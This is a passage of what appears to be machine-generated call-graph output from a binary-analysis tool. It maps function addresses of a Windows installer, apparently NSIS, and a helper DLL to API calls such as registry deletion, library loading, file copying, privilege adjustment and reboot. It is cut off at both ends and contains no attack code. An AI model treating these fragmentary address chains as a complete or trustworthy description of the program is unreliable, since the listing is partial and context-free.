5529->5533 5531 402012 5534 406193 wsprintfW 5531->5534 5533->5531 5534->5524 4402 403d08 4403 403d20 4402->4403 4404 403e5b 4402->4404 4403->4404 4405 403d2c 4403->4405 4406 403eac 4404->4406 4407 403e6c GetDlgItem GetDlgItem 4404->4407 4409 403d37 SetWindowPos 4405->4409 4410 403d4a 4405->4410 4408 403f06 4406->4408 4416 401389 2 API calls 4406->4416 4473 4041e1 4407->4473 4434 403e56 4408->4434 4479 40422d 4408->4479 4409->4410 4413 403d67 4410->4413 4414 403d4f ShowWindow 4410->4414 4417 403d89 4413->4417 4418 403d6f DestroyWindow 4413->4418 4414->4413 4415 403e96 KiUserCallbackDispatcher 4476 40140b 4415->4476 4422 403ede 4416->4422 4420 403d8e SetWindowLongW 4417->4420 4421 403d9f 4417->4421 4472 40416a 4418->4472 4420->4434 4423 403e48 4421->4423 4424 403dab GetDlgItem 4421->4424 4422->4408 4425 403ee2 SendMessageW 4422->4425 4495 404248 4423->4495 4428 403ddb 4424->4428 4429 403dbe SendMessageW IsWindowEnabled 4424->4429 4425->4434 4426 40140b 2 API calls 4445 403f18 4426->4445 4427 40416c DestroyWindow EndDialog 4427->4472 4433 403de0 4428->4433 4435 403de8 4428->4435 4437 403e2f SendMessageW 4428->4437 4438 403dfb 4428->4438 4429->4428 4429->4434 4431 40419b ShowWindow 4431->4434 4432 40626e 17 API calls 4432->4445 4492 4041ba 4433->4492 4435->4433 4435->4437 4437->4423 4440 403e03 4438->4440 4441 403e18 4438->4441 4439 403e16 4439->4423 4444 40140b 2 API calls 4440->4444 4443 40140b 2 API calls 4441->4443 4442 4041e1 18 API calls 4442->4445 4446 403e1f 4443->4446 4444->4433 4445->4426 4445->4427 4445->4432 4445->4434 4445->4442 4447 4041e1 18 API calls 4445->4447 4463 4040ac DestroyWindow 4445->4463 4446->4423 4446->4433 4448 403f93 GetDlgItem 4447->4448 4449 403fb0 ShowWindow KiUserCallbackDispatcher 4448->4449 4450 403fa8 4448->4450 4482 404203 KiUserCallbackDispatcher 4449->4482 4450->4449 4452 403fda EnableWindow 4457 403fee 4452->4457 4453 403ff3 GetSystemMenu EnableMenuItem SendMessageW 4454 404023 SendMessageW 4453->4454 4453->4457 4454->4457 4457->4453 4483 404216 SendMessageW 4457->4483 4484 403ce9 4457->4484 4487 40624c lstrcpynW 4457->4487 4459 404052 lstrlenW 4460 40626e 17 API calls 4459->4460 4461 404068 SetWindowTextW 4460->4461 4488 401389 4461->4488 4464 4040c6 CreateDialogParamW 4463->4464 4463->4472 4465 4040f9 4464->4465 4464->4472 4466 4041e1 18 API calls 4465->4466 4467 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4466->4467 4468 401389 2 API calls 4467->4468 4469 40414a 4468->4469 4469->4434 4470 404152 ShowWindow 4469->4470 4471 40422d SendMessageW 4470->4471 4471->4472 4472->4431 4472->4434 4474 40626e 17 API calls 4473->4474 4475 4041ec SetDlgItemTextW 4474->4475 4475->4415 4477 401389 2 API calls 4476->4477 4478 401420 4477->4478 4478->4406 4480 404245 4479->4480 4481 404236 SendMessageW 4479->4481 4480->4445 4481->4480 4482->4452 4483->4457 4485 40626e 17 API calls 4484->4485 4486 403cf7 SetWindowTextW 4485->4486 4486->4457 4487->4459 4490 401390 4488->4490 4489 4013fe 4489->4445 4490->4489 4491 4013cb MulDiv SendMessageW 4490->4491 4491->4490 4493 4041c1 4492->4493 4494 4041c7 SendMessageW 4492->4494 4493->4494 4494->4439 4496 404260 GetWindowLongW 4495->4496 4506 4042e9 4495->4506 4497 404271 4496->4497 4496->4506 4498 404280 GetSysColor 4497->4498 4499 404283 4497->4499 4498->4499 4500 404293 SetBkMode 4499->4500 4501 404289 SetTextColor 4499->4501 4502 4042b1 4500->4502 4503 4042ab GetSysColor 4500->4503 4501->4500 4504 4042c2 4502->4504 4505 4042b8 SetBkColor 4502->4505 4503->4502 4504->4506 4507 4042d5 DeleteObject 4504->4507 4508 4042dc CreateBrushIndirect 4504->4508 4505->4504 4506->4434 4507->4508 4508->4506 4509 402388 4510 402390 4509->4510 4511 4023bb 4509->4511 4521 402c77 4510->4521 4513 402c37 17 API calls 4511->4513 4515 4023c2 4513->4515 4526 402cf5 4515->4526 4517 4023a1 4519 402c37 17 API calls 4517->4519 4518 4023cf 4520 4023a8 RegDeleteValueW RegCloseKey 4519->4520 4520->4518 4522 402c37 17 API calls 4521->4522 4523 402c8e 4522->4523 4524 4060b9 RegOpenKeyExW 4523->4524 4525 402397 4524->4525 4525->4517 4525->4518 4528 402d0b 4526->4528 4527 402d21 4527->4518 4528->4527 4530 402d2a 4528->4530 4531 4060b9 RegOpenKeyExW 4530->4531 4533 402d58 4531->4533 4532 402d7e RegEnumKeyW 4532->4533 4534 402d95 RegCloseKey 4532->4534 4533->4532 4533->4534 4535 402db6 RegCloseKey 4533->4535 4537 402d2a 6 API calls 4533->4537 4540 402da9 4533->4540 4536 406626 5 API calls 4534->4536 4535->4540 4538 402da5 4536->4538 4537->4533 4539 402dc4 RegDeleteKeyW 4538->4539 4538->4540 4539->4540 4540->4527 5542 40190c 5543 401943 5542->5543 5544 402c37 17 API calls 5543->5544 5545 401948 5544->5545 5546 40595a 67 API calls 5545->5546 5547 401951 5546->5547 5555 401d0e 5556 402c15 17 API calls 5555->5556 5557 401d15 5556->5557 5558 402c15 17 API calls 5557->5558 5559 401d21 GetDlgItem 5558->5559 5560 40258c 5559->5560 5561 1000164f 5562 10001516 GlobalFree 5561->5562 5564 10001667 5562->5564 5563 100016ad GlobalFree 5564->5563 5565 10001682 5564->5565 5566 10001699 VirtualFree 5564->5566 5565->5563 5566->5563 5567 40190f 5568 402c37 17 API calls 5567->5568 5569 401916 5568->5569 5570 4058ae MessageBoxIndirectW 5569->5570 5571 40191f 5570->5571 5572 401491 5573 4052b0 24 API calls 5572->5573 5574 401498 5573->5574 5575 402592 5576 4025c1 5575->5576 5577 4025a6 5575->5577 5579 4025f5 5576->5579 5580 4025c6 5576->5580 5578 402c15 17 API calls 5577->5578 5585 4025ad 5578->5585 5581 402c37 17 API calls 5579->5581 5582 402c37 17 API calls 5580->5582 5584 4025fc lstrlenW 5581->5584 5583 4025cd WideCharToMultiByte lstrlenA 5582->5583 5583->5585 5584->5585 5587 405e1f 5 API calls 5585->5587 5588 40263f 5585->5588 5589 402629 5585->5589 5586 405df0 WriteFile 5586->5588 5587->5589 5589->5586 5589->5588 5597 10001058 5599 10001074 5597->5599 5598 100010dd 5599->5598 5600 10001092 5599->5600 5601 10001516 GlobalFree 5599->5601 5602 10001516 GlobalFree 5600->5602 5601->5600 5603 100010a2 5602->5603 5604 100010b2 5603->5604 5605 100010a9 GlobalSize 5603->5605 5606 100010b6 GlobalAlloc 5604->5606 5608 100010c7 5604->5608 5605->5604 5607 1000153d 3 API calls 5606->5607 5607->5608 5609 100010d2 GlobalFree 5608->5609 5609->5598 5610 403918 5611 403923 5610->5611 5612 403927 5611->5612 5613 40392a GlobalAlloc 5611->5613 5613->5612 5614 401c19 5615 402c15 17 API calls 5614->5615 5616 401c20 5615->5616 5617 402c15 17 API calls 5616->5617 5618 401c2d 5617->5618 5619 401c42 5618->5619 5620 402c37 17 API calls 5618->5620 5621 401c52 5619->5621 5622 402c37 17 API calls 5619->5622 5620->5619 5623 401ca9 5621->5623 5624 401c5d 5621->5624 5622->5621 5626 402c37 17 API calls 5623->5626 5625 402c15 17 API calls 5624->5625 5627 401c62 5625->5627 5628 401cae 5626->5628 5629 402c15 17 API calls 5627->5629 5630 402c37 17 API calls 5628->5630 5631 401c6e 5629->5631 5632 401cb7 FindWindowExW 5630->5632 5633 401c99 SendMessageW 5631->5633 5634 401c7b SendMessageTimeoutW 5631->5634 5635 401cd9 5632->5635 5633->5635 5634->5635 5636 402a9a SendMessageW 5637 402ab4 InvalidateRect 5636->5637 5638 402abf 5636->5638 5637->5638 5639 40281b 5640 402821 5639->5640 5641 402829 FindClose 5640->5641 5642 402abf 5640->5642 5641->5642 5643 40149e 5644 4022f1 5643->5644 5645 4014ac PostQuitMessage 5643->5645 5645->5644 5646 100010e1 5655 10001111 5646->5655 5647 100011d8 GlobalFree 5648 100012ba 2 API calls 5648->5655 5649 100011d3 5649->5647 5650 10001272 2 API calls 5653 100011c4 GlobalFree 5650->5653 5651 10001164 GlobalAlloc 5651->5655 5652 100011f8 GlobalFree 5652->5655 5653->5655 5654 100012e1 lstrcpyW 5654->5655 5655->5647 5655->5648 5655->5649 5655->5650 5655->5651 5655->5652 5655->5653 5655->5654 5656 406ca2 5660 4067da 5656->5660 5657 407145 5658 406864 GlobalAlloc 5658->5657 5658->5660 5659 40685b GlobalFree 5659->5658 5660->5657 5660->5658 5660->5659 5660->5660 5661 4068d2 GlobalFree 5660->5661 5662 4068db GlobalAlloc 5660->5662 5661->5662 5662->5657 5662->5660 5663 4029a2 5664 402c15 17 API calls 5663->5664 5665 4029a8 5664->5665 5666 4029e8 5665->5666 5667 4029cf 5665->5667 5671 402885 5665->5671 5669 402a02 5666->5669 5670 4029f2 5666->5670 5668 4029d4 5667->5668 5676 4029e5 5667->5676 5677 40624c lstrcpynW 5668->5677 5673 40626e 17 API calls 5669->5673 5672 402c15 17 API calls 5670->5672 5672->5676 5673->5676 5676->5671 5678 406193 wsprintfW 5676->5678 5677->5671 5678->5671 4364 4015a3 4365 402c37 17 API calls 4364->4365 4366 4015aa SetFileAttributesW 4365->4366 4367 4015bc 4366->4367 5679 405224 5680 405234 5679->5680 5681 405248 5679->5681 5683 405291 5680->5683 5684 40523a 5680->5684 5682 405250 IsWindowVisible 5681->5682 5690 405267 5681->5690 5682->5683 5685 40525d 5682->5685 5686 405296 CallWindowProcW 5683->5686 5687 40422d SendMessageW 5684->5687 5692 404b7a SendMessageW 5685->5692 5689 405244 5686->5689 5687->5689 5690->5686 5697 404bfa 5690->5697 5693 404bd9 SendMessageW 5692->5693 5694 404b9d GetMessagePos ScreenToClient SendMessageW 5692->5694 5695 404bd1 5693->5695 5694->5695 5696 404bd6 5694->5696 5695->5690 5696->5693 5706 40624c lstrcpynW 5697->5706 5699 404c0d 5707 406193 wsprintfW 5699->5707 5701 404c17 5702 40140b 2 API calls 5701->5702 5703 404c20 5702->5703 5708 40624c lstrcpynW 5703->5708 5705 404c27 5705->5683 5706->5699 5707->5701 5708->5705 5709 4028a7 5710 402c37 17 API calls 5709->5710 5711 4028b5 5710->5711 5712 4028cb 5711->5712 5713 402c37 17 API calls 5711->5713 5714 405d19 2 API calls 5712->5714 5713->5712 5715 4028d1 5714->5715 5737 405d3e GetFileAttributesW CreateFileW 5715->5737 5717 4028de 5718 402981 5717->5718 5719 4028ea GlobalAlloc 5717->5719 5722 402989 DeleteFileW 5718->5722 5723 40299c 5718->5723 5720 402903 5719->5720 5721 402978 CloseHandle 5719->5721 5738 4032f5 SetFilePointer 5720->5738 5721->5718 5722->5723 5725 402909 5726 4032df ReadFile 5725->5726 5727 402912 GlobalAlloc 5726->5727 5728 402922 5727->5728 5729 402956 5727->5729 5730 4030fa 35 API calls 5728->5730 5731 405df0 WriteFile 5729->5731 5736 40292f 5730->5736 5732 402962 GlobalFree 5731->5732 5733 4030fa 35 API calls 5732->5733 5734 402975 5733->5734 5734->5721 5735 40294d GlobalFree 5735->5729 5736->5735 5737->5717 5738->5725 4550 40202c 4551 40203e 4550->4551 4552 4020f0 4550->4552 4553 402c37 17 API calls 4551->4553 4554 401423 24 API calls 4552->4554 4555 402045 4553->4555 4560 40224a 4554->4560 4556 402c37 17 API calls 4555->4556 4557 40204e 4556->4557 4558 402064 LoadLibraryExW 4557->4558 4559 402056 GetModuleHandleW 4557->4559 4558->4552 4561 402075 4558->4561 4559->4558 4559->4561 4573 406695 WideCharToMultiByte 4561->4573 4564 402086 4566 4020a5 4564->4566 4567 40208e 4564->4567 4565 4020bf 4568 4052b0 24 API calls 4565->4568 4576 10001759 4566->4576 4569 401423 24 API calls 4567->4569 4570 402096 4568->4570 4569->4570 4570->4560 4571 4020e2 FreeLibrary 4570->4571 4571->4560 4574 402080 4573->4574 4575 4066bf GetProcAddress 4573->4575 4574->4564 4574->4565 4575->4574 4577 10001789 4576->4577 4618 10001b18 4577->4618 4579 10001790 4580 100018a6 4579->4580 4581 100017a1 4579->4581 4582 100017a8 4579->4582 4580->4570 4666 10002286 4581->4666 4650 100022d0 4582->4650 4587 1000180c 4591 10001812 4587->4591 4592 1000184e 4587->4592 4588 100017ee 4679 100024a4 4588->4679 4589 100017be 4597 100017c4 4589->4597 4598 100017cf 4589->4598 4600 100015b4 3 API calls 4591->4600 4595 100024a4 9 API calls 4592->4595 4593 100017d7 4601 100017cd 4593->4601 4676 10002b57 4593->4676 4602 10001840 4595->4602 4596 100017f4 4689 100015b4 4596->4689 4597->4601 4660 1000289c 4597->4660 4670 10002640 4598->4670 4605 10001828 4600->4605 4601->4587 4601->4588 4609 10001895 4602->4609 4700 10002467 4602->4700 4608 100024a4 9 API calls 4605->4608 4607 100017d5 4607->4601 4608->4602 4609->4580 4611 1000189f GlobalFree 4609->4611 4611->4580 4615 10001881 4615->4609 4704 1000153d wsprintfW 4615->4704 4616 1000187a FreeLibrary 4616->4615 4707 1000121b GlobalAlloc 4618->4707 4620 10001b3c 4708 1000121b GlobalAlloc 4620->4708 4622 10001d7a GlobalFree GlobalFree GlobalFree 4624 10001d97 4622->4624 4633 10001de1 4622->4633 4623 10001b47 4623->4622 4627 10001c1d GlobalAlloc 4623->4627 4629 10001c86 GlobalFree 4623->4629 4632 10001c68 lstrcpyW 4623->4632 4623->4633 4635 10001c72 lstrcpyW 4623->4635 4637 10002048 4623->4637 4644 10001cc4 4623->4644 4645 10001f37 GlobalFree 4623->4645 4648 1000122c 2 API calls 4623->4648 4714 1000121b GlobalAlloc 4623->4714 4625 10001dac 4624->4625 4626 100020ee 4624->4626 4624->4633 4625->4633 4711 1000122c 4625->4711 4628 10002110 GetModuleHandleW 4626->4628 4626->4633 4627->4623 4630 10002121 LoadLibraryW 4628->4630 4631 10002136 4628->4631 4629->4623 4630->4631 4630->4633 4715 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4631->4715 4632->4635 4633->4579 4635->4623 4636 10002188 4636->4633 4638 10002195 lstrlenW 4636->4638 4637->4633 4643 10002090 lstrcpyW 4637->4643 4716 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4638->4716 4642 10002148 4642->4636 4649 10002172 GetProcAddress 4642->4649 4643->4633 4644->4623 4709 1000158f GlobalSize GlobalAlloc 4644->4709 4645->4623 4646 100021af 4646->4633 4648->4623 4649->4636 4652 100022e8 4650->4652 4651 1000122c GlobalAlloc lstrcpynW 4651->4652 4652->4651 4654 10002410 GlobalFree 4652->4654 4655 100023ba GlobalAlloc 4652->4655 4656 1000238f GlobalAlloc WideCharToMultiByte 4652->4656 4658 100023d1 4652->4658 4718 100012ba 4652->4718 4654->4652 4657 100017ae 4654->4657 4655->4658 4656->4654 4657->4589 4657->4593 4657->4601 4658->4654 4722 100025d4 4658->4722 4662 100028ae 4660->4662 4661 10002953 CreateFileA 4663 10002971 4661->4663 4662->4661 4664 10002a62 GetLastError 4663->4664 4665 10002a6d 4663->4665 4664->4665 4665->4601 4667 10002296 4666->4667 4668 100017a7 4666->4668 4667->4668 4669 100022a8 GlobalAlloc 4667->4669 4668->4582 4669->4667 4673 1000265c 4670->4673 4671 100026c0 4674 100026c5 GlobalSize 4671->4674 4675 100026cf 4671->4675 4672 100026ad GlobalAlloc 4672->4675 4673->4671 4673->4672 4674->4675 4675->4607 4677 10002b62 4676->4677 4678 10002ba2 GlobalFree 4677->4678 4725 1000121b GlobalAlloc 4679->4725 4681 10002506 MultiByteToWideChar 4686 100024ae 4681->4686 4682 1000253c lstrcpynW 4682->4686 4683 1000256c GlobalFree 4683->4686 4684 1000254f wsprintfW 4684->4686 4685 100025a7 GlobalFree 4685->4596 4686->4681 4686->4682 4686->4683 4686->4684 4686->4685 4687 10001272 2 API calls 4686->4687 4726 100012e1 4686->4726 4687->4686 4730 1000121b GlobalAlloc 4689->4730 4691 100015ba 4692 100015c7 lstrcpyW 4691->4692 4694 100015e1 4691->4694 4695 100015fb 4692->4695 4694->4695 4696 100015e6 wsprintfW 4694->4696 4697 10001272 4695->4697 4696->4695 4698 100012b5 GlobalFree 4697->4698 4699 1000127b GlobalAlloc lstrcpynW 4697->4699 4698->4602 4699->4698 4701 10001861 4700->4701 4702 10002475 4700->4702 4701->4615 4701->4616 4702->4701 4703 10002491 GlobalFree 4702->4703 4703->4702 4705 10001272 2 API calls 4704->4705 4706 1000155e 4705->4706 4706->4609 4707->4620 4708->4623 4710 100015ad 4709->4710 4710->4644 4717 1000121b GlobalAlloc 4711->4717 4713 1000123b lstrcpynW 4713->4633 4714->4623 4715->4642 4716->4646 4717->4713 4719 100012c1 4718->4719 4720 1000122c 2 API calls 4719->4720 4721 100012df 4720->4721 4721->4652 4723 100025e2 VirtualAlloc 4722->4723 4724 10002638 4722->4724 4723->4724 4724->4658 4725->4686 4727 100012ea 4726->4727 4728 1000130c 4726->4728 4727->4728 4729 100012f0 lstrcpyW 4727->4729 4728->4686 4729->4728 4730->4691 5739 404c2c GetDlgItem GetDlgItem 5740 404c7e 7 API calls 5739->5740 5743 404e97 5739->5743 5741 404d21 DeleteObject 5740->5741 5742 404d14 SendMessageW 5740->5742 5744 404d2a 5741->5744 5742->5741 5750 404f7b 5743->5750 5758 404b7a 5 API calls 5743->5758 5770 404f08 5743->5770 5745 404d61 5744->5745 5747 40626e 17 API calls 5744->5747 5748 4041e1 18 API calls 5745->5748 5746 405027 5751 405031 SendMessageW 5746->5751 5757 405039 5746->5757 5752 404d43 SendMessageW SendMessageW 5747->5752 5749 404d75 5748->5749 5753 4041e1 18 API calls 5749->5753 5750->5746 5754 404fd4 SendMessageW 5750->5754 5782 404e8a 5750->5782 5751->5757 5752->5744 5771 404d83 5753->5771 5760 404fe9 SendMessageW 5754->5760 5754->5782 5755 404248 8 API calls 5761 40521d 5755->5761 5756 404f6d SendMessageW 5756->5750 5762 405052 5757->5762 5763 40504b ImageList_Destroy 5757->5763 5767 405062 5757->5767 5758->5770 5759 4051d1 5768 4051e3 ShowWindow GetDlgItem ShowWindow 5759->5768 5759->5782 5766 404ffc 5760->5766 5764 40505b GlobalFree 5762->5764 5762->5767 5763->5762 5764->5767 5765 404e58 GetWindowLongW SetWindowLongW 5769 404e71 5765->5769 5776 40500d SendMessageW 5766->5776 5767->5759 5781 404bfa 4 API calls 5767->5781 5786 40509d 5767->5786 5768->5782 5772 404e77 ShowWindow 5769->5772 5773 404e8f 5769->5773 5770->5750 5770->5756 5771->5765 5775 404dd3 SendMessageW 5771->5775 5777 404e52 5771->5777 5779 404e20 SendMessageW 5771->5779 5780 404e0f SendMessageW 5771->5780 5790 404216 SendMessageW 5772->5790 5791 404216 SendMessageW 5773->5791 5775->5771 5776->5746 5777->5765 5777->5769 5779->5771 5780->5771 5781->5786 5782->5755 5783 4051a7 InvalidateRect 5783->5759 5784 4051bd 5783->5784 5792 404b35 5784->5792 5785 4050cb SendMessageW 5789 4050e1 5785->5789 5786->5785 5786->5789 5788 405155 SendMessageW SendMessageW 5788->5789 5789->5783 5789->5788 5790->5782 5791->5743 5795 404a6c 5792->5795 5794 404b4a 5794->5759 5796 404a85 5795->5796 5797 40626e 17 API calls 5796->5797 5798 404ae9 5797->5798 5799 40626e 17 API calls 5798->5799 5800 404af4 5799->5800 5801 40626e 17 API calls 5800->5801 5802 404b0a lstrlenW wsprintfW SetDlgItemTextW 5801->5802 5802->5794 5803 402a2f 5804 402c15 17 API calls 5803->5804 5805 402a35 5804->5805 5806 402a6c 5805->5806 5808 402885 5805->5808 5809 402a47 5805->5809 5807 40626e 17 API calls 5806->5807 5806->5808 5807->5808 5809->5808 5811 406193 wsprintfW 5809->5811 5811->5808 5812 40432f lstrlenW 5813 404350 WideCharToMultiByte 5812->5813 5814 40434e 5812->5814 5814->5813 5815 401a30 5816 402c37 17 API calls 5815->5816 5817 401a39 ExpandEnvironmentStringsW 5816->5817 5818 401a4d 5817->5818 5820 401a60 5817->5820 5819 401a52 lstrcmpW 5818->5819 5818->5820 5819->5820 5821 4046b0 5822 4046dc 5821->5822 5823 4046ed 5821->5823 5882 405892 GetDlgItemTextW 5822->5882 5825 4046f9 GetDlgItem 5823->5825 5827 404758 5823->5827 5831 40470d 5825->5831 5826 4046e7 5828 4064e0 5 API calls 5826->5828 5832 40626e 17 API calls 5827->5832 5843 40483c 5827->5843 5880 4049eb 5827->5880 5828->5823 5830 404721 SetWindowTextW 5834 4041e1 18 API calls 5830->5834 5831->5830 5836 405bc8 4 API calls 5831->5836 5838 4047cc SHBrowseForFolderW 5832->5838 5833 40486c 5839 405c25 18 API calls 5833->5839 5840 40473d 5834->5840 5835 404248 8 API calls 5841 4049ff 5835->5841 5837 404717 5836->5837 5837->5830 5846 405b1d 3 API calls 5837->5846 5842 4047e4 CoTaskMemFree 5838->5842 5838->5843 5844 404872 5839->5844 5845 4041e1 18 API calls 5840->5845 5847 405b1d 3 API calls 5842->5847 5843->5880 5884 405892 GetDlgItemTextW 5843->5884 5885 40624c lstrcpynW 5844->5885 5848 40474b 5845->5848 5846->5830 5849 4047f1 5847->5849 5883 404216 SendMessageW 5848->5883 5852 404828 SetDlgItemTextW 5849->5852 5857 40626e 17 API calls 5849->5857 5852->5843 5853 404751 5855 406626 5 API calls 5853->5855 5854 404889 5856 406626 5 API calls 5854->5856 5855->5827 5863 404890 5856->5863 5858 404810 lstrcmpiW 5857->5858 5858->5852 5861 404821 lstrcatW 5858->5861 5859 4048d1 5886 40624c lstrcpynW 5859->5886 5861->5852 5862 4048d8 5864 405bc8 4 API calls 5862->5864 5863->5859 5867 405b69 2 API calls 5863->5867 5869 404929 5863->5869 5865 4048de GetDiskFreeSpaceW 5864->5865 5868 404902 MulDiv 5865->5868 5865->5869 5867->5863 5868->5869 5870 40499a 5869->5870 5872 404b35 20 API calls 5869->5872 5871 4049bd 5870->5871 5873 40140b 2 API calls 5870->5873 5887 404203 KiUserCallbackDispatcher 5871->5887 5874 404987 5872->5874 5873->5871 5876 40499c SetDlgItemTextW 5874->5876 5877 40498c 5874->5877 5876->5870 5879 404a6c 20 API calls 5877->5879 5878 4049d9 5878->5880 5881 404609 SendMessageW 5878->5881 5879->5870 5880->5835 5881->5880 5882->5826 5883->5853 5884->5833 5885->5854 5886->5862 5887->5878 5893 401db3 GetDC 5894 402c15 17 API calls 5893->5894 5895 401dc5 GetDeviceCaps MulDiv ReleaseDC 5894->5895 5896 402c15 17 API calls 5895->5896 5897 401df6 5896->5897 5898 40626e 17 API calls 5897->5898 5899 401e33 CreateFontIndirectW 5898->5899 5900 40258c 5899->5900 5901 402835 5902 40283d 5901->5902 5903 402841 FindNextFileW 5902->5903 5904 402853 5902->5904 5903->5904 5905 4029e0 5904->5905 5907 40624c lstrcpynW 5904->5907 5907->5905 5908 401735 5909 402c37 17 API calls 5908->5909 5910 40173c SearchPathW 5909->5910 5911 401757 5910->5911 5913 4029e0 5910->5913 5911->5913 5914 40624c lstrcpynW 5911->5914 5914->5913 5915 10002a77 5916 10002a8f 5915->5916 5917 1000158f 2 API calls 5916->5917 5918 10002aaa 5917->5918 5919 4014b8 5920 4014be 5919->5920 5921 401389 2 API calls 5920->5921 5922 4014c6 5921->5922 4892 40333d SetErrorMode GetVersion 4893 40337c 4892->4893 4894 403382 4892->4894 4895 406626 5 API calls 4893->4895 4896 4065b6 3 API calls 4894->4896 4895->4894 4897 403398 lstrlenA 4896->4897 4897->4894 4898 4033a8 4897->4898 4899 406626 5 API calls 4898->4899 4900 4033af 4899->4900 4901 406626 5 API calls 4900->4901 4902 4033b6 4901->4902 4903 406626 5 API calls 4902->4903 4904 4033c2 #17 OleInitialize SHGetFileInfoW 4903->4904 4983 40624c lstrcpynW 4904->4983 4907 40340e GetCommandLineW 4984 40624c lstrcpynW 4907->4984 4909 403420 GetModuleHandleW 4910 403438 4909->4910 4911 405b4a CharNextW 4910->4911 4912 403447 CharNextW 4911->4912 4913 403571 GetTempPathW 4912->4913 4914 403460 4912->4914 4985 40330c 4913->4985 4914->4914 4920 405b4a CharNextW 4914->4920 4927 40355c 4914->4927 4928 40355a 4914->4928 4916 403589 4917 4035e3 DeleteFileW 4916->4917 4918 40358d GetWindowsDirectoryW lstrcatW 4916->4918 4995 402ec1 GetTickCount GetModuleFileNameW 4917->4995 4919 40330c 12 API calls 4918->4919 4922 4035a9 4919->4922 4920->4914 4922->4917 4924 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4922->4924 4923 4035f7 4925 4036aa 4923->4925 4929 40369a 4923->4929 4934 405b4a CharNextW 4923->4934 4926 40330c 12 API calls 4924->4926 5082 403880 4925->5082 4932 4035db 4926->4932 5079 40624c lstrcpynW 4927->5079 4928->4913 5023 40395a 4929->5023 4932->4917 4932->4925 4950 403616 4934->4950 4936 4037e4 4939 403868 ExitProcess 4936->4939 4940 4037ec GetCurrentProcess OpenProcessToken 4936->4940 4937 4036c4 4938 4058ae MessageBoxIndirectW 4937->4938 4942 4036d2 ExitProcess 4938->4942 4945 403804 LookupPrivilegeValueW AdjustTokenPrivileges 4940->4945 4946 403838 4940->4946 4943 403674 4947 405c25 18 API calls 4943->4947 4944 4036da 4948 405819 5 API calls 4944->4948 4945->4946 4949 406626 5 API calls 4946->4949 4951 403680 4947->4951 4952 4036df lstrcatW 4948->4952 4953 40383f 4949->4953 4950->4943 4950->4944 4951->4925 5080 40624c lstrcpynW 4951->5080 4954 4036f0 lstrcatW 4952->4954 4955 4036fb lstrcatW lstrcmpiW 4952->4955 4956 403854 ExitWindowsEx 4953->4956 4959 403861 4953->4959 4954->4955 4955->4925 4958 403717 4955->4958 4956->4939 4956->4959 4962 403723 4958->4962 4963 40371c 4958->4963 4960 40140b 2 API calls 4959->4960 4960->4939 4961 40368f 5081 40624c lstrcpynW 4961->5081 4966 4057fc 2 API calls 4962->4966 4965 40577f 4 API calls 4963->4965 4967 403721 4965->4967 4968 403728 SetCurrentDirectoryW 4966->4968 4967->4968 4969 403743 4968->4969 4970 403738 4968->4970 5090 40624c lstrcpynW 4969->5090 5089 40624c lstrcpynW 4970->5089 4973 40626e 17 API calls 4974 403782 DeleteFileW 4973->4974 4975 40378f CopyFileW 4974->4975 4980 403751 4974->4980 4975->4980 4976 4037d8 4977 406012 36 API calls 4976->4977 4977->4925 4978 406012 36 API calls 4978->4980 4979 40626e 17 API calls 4979->4980 4980->4973 4980->4976 4980->4978 4980->4979 4981 405831 2 API calls 4980->4981 4982 4037c3 CloseHandle 4980->4982 4981->4980 4982->4980 4983->4907 4984->4909 4986 4064e0 5 API calls 4985->4986 4988 403318 4986->4988 4987 403322 4987->4916 4988->4987 4989 405b1d 3 API calls 4988->4989 4990 40332a 4989->4990 4991 4057fc 2 API calls 4990->4991 4992 403330 4991->4992 4993 405d6d 2 API calls 4992->4993 4994 40333b 4993->4994 4994->4916 5091 405d3e GetFileAttributesW CreateFileW 4995->5091 4997 402f01 5022 402f11 4997->5022 5092 40624c lstrcpynW 4997->5092 4999 402f27 5000 405b69 2 API calls 4999->5000 5001 402f2d 5000->5001 5093 40624c lstrcpynW 5001->5093 5003 402f38 GetFileSize 5004 403034 5003->5004 5021 402f4f 5003->5021 5094 402e5d 5004->5094 5006 40303d 5008 40306d GlobalAlloc 5006->5008 5006->5022 5106 4032f5 SetFilePointer 5006->5106 5007 4032df ReadFile 5007->5021 5105 4032f5 SetFilePointer 5008->5105 5010 4030a0 5013 402e5d 6 API calls 5010->5013 5012 403088 5015 4030fa 35 API calls 5012->5015 5013->5022 5014 403056 5016 4032df ReadFile 5014->5016 5019 403094 5015->5019 5017 403061 5016->5017 5017->5008 5017->5022 5018 402e5d 6 API calls 5018->5021 5019->5019 5020 4030d1 SetFilePointer 5019->5020 5019->5022 5020->5022 5021->5004 5021->5007 5021->5010 5021->5018 5021->5022 5022->4923 5024 406626 5 API calls 5023->5024 5025 40396e 5024->5025 5026 403974 5025->5026 5027 403986 5025->5027 5115 406193 wsprintfW 5026->5115 5028 40611a 3 API calls 5027->5028 5029 4039b6 5028->5029 5030 4039d5 lstrcatW 5029->5030 5033 40611a 3 API calls 5029->5033 5032 403984 5030->5032 5107 403c30 5032->5107 5033->5030 5036 405c25 18 API calls 5037 403a07 5036->5037 5038 403a9b 5037->5038 5041 40611a 3 API calls 5037->5041 5039 405c25 18 API calls 5038->5039 5040 403aa1 5039->5040 5042 403ab1 LoadImageW 5040->5042 5044 40626e 17 API calls 5040->5044 5043 403a39 5041->5043 5045 403b57 5042->5045 5046 403ad8 RegisterClassW 5042->5046 5043->5038 5047 403a5a lstrlenW 5043->5047 5051 405b4a CharNextW 5043->5051 5044->5042 5050 40140b 2 API calls 5045->5050 5048 403b61 5046->5048 5049 403b0e SystemParametersInfoW CreateWindowExW 5046->5049 5052 403a68 lstrcmpiW 5047->5052 5053 403a8e 5047->5053 5048->4925 5049->5045 5054 403b5d 5050->5054 5055 403a57 5051->5055 5052->5053 5056 403a78 GetFileAttributesW 5052->5056 5057 405b1d 3 API calls 5053->5057 5054->5048 5059 403c30 18 API calls 5054->5059 5055->5047 5058 403a84 5056->5058 5060 403a94 5057->5060 5058->5053 5061 405b69 2 API calls 5058->5061 5062 403b6e 5059->5062 5116 40624c lstrcpynW 5060->5116 5061->5053 5064 403b7a ShowWindow 5062->5064 5065 403bfd 5062->5065 5067 4065b6 3 API calls 5064->5067 5066 405383 5 API calls 5065->5066 5068 403c03 5066->5068 5069 403b92 5067->5069 5071 403c07 5068->5071 5072 